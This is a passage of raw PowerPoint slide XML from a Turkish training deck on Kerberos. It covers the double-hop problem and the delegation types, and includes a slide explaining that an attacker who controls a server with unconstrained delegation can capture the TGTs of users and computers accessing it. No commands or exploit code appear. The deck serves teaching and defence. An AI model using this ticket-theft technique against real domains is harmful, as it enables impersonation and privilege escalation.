              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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https://github.com/forestallio/Kerberos/raw/master/pcap/KRB_WSMAN.pcapng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adresindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dosyasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>indirerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>trafiğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aracı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz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4925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243B9-0563-095E-E76B-1FED7C530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Kerberos Double Hop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sorunu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31538-1DC3-0D58-234C-CED04C2015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Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>doğası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gereği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemcinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunuculara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişmesini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>engellemektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Örneğin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IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sonucunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgilerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>veritabanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucusuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sağlarken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanamamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu durum da Double Hop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adlandırılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çözmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yöntemler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geliştirmiştir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Unconstrained Delegation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Constrained Delegation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Resource Based Constrained Delegation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DB7943-66B0-7AA2-F9A4-EF16FD960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142395"/>
            <a:ext cx="5181600" cy="37177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68142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7545F-C62B-9462-168E-86FD2D85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Unconstrained Delegation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85AEA5B-A0F1-2719-13D3-8DA2356D22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Unconstrained Delegation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Kısıtlamasız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Delegasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kendisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemcileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> (impersonation) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yeteneği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sağlanmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>isimden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>anlaşılacağı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aşamasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>herhangi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kısıtlama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Yani </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servislere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yeteneğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>işlemin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gerçekleşebilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolünün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aşamasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istemci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biletini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>göndermektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gerekli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>biletini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DC’den</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>almaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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1FEA470-63F4-62D5-3591-D290972B8E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84890"/>
            <a:ext cx="5181600" cy="34328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120261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62032-E5D9-2CBC-1A89-7C0348622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Unconstrained Delegation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67CDCC-E7F4-DAC2-84E3-9F087745F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57" y="1825625"/>
            <a:ext cx="9065286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86030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527F-83B1-5F9B-A0E6-9EF940CA8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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> Not – Unconstrained Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Zafiyeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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97AB8-5521-E67D-99A3-0E7D35F4B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Saldırganlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Unconstrained Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>opsiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Saldırgan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
